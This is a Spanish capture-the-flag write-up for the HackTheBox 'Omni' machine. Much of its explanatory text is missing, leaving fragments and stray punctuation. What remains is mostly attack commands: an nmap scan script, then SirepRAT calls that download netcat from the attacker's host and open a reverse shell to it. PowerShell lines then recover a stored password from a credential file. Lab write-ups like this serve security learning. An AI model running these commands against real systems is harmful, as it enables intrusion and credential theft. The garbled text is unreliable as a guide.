Sigo publicando soluciones enviadas para la finalización de máquinas desde el sitio HackTheBox (https://www.hackthebox.eu). Espero que esto ayude al menos a alguien a desarrollarse en el campo de la seguridad de la información.
La conexión al laboratorio se realiza mediante VPN. Se recomienda no conectarse desde una computadora de trabajo o desde un host donde haya datos importantes para usted, ya que se encuentra en una red privada con personas que saben algo sobre seguridad de la información :)
Información organizacional
Recon
IP 10.10.10.204, /etc/hosts.
10.10.10.204 omni.htb
. , - :
#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1
, 8080 HTTP “Windows Device Portal”. .
, IoT SirepRAT.
Entry Point
.
sudo python3 -m http.server 80
netcat, netcat.
python SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell IWR -Uri http://10.10.14.112/nc64.exe -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe"
python SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.112 4321" --v
.
PowerShell. , , - . .
Get-ChildItem -Path "C:\Program Files" –Recurse -force
. . .
USER
.
.
$userTXT = Import-CliXml -Path C:\Data\Users\app\user.txt
$userTXT.GetNetworkCredential().Password
ROOT
.
.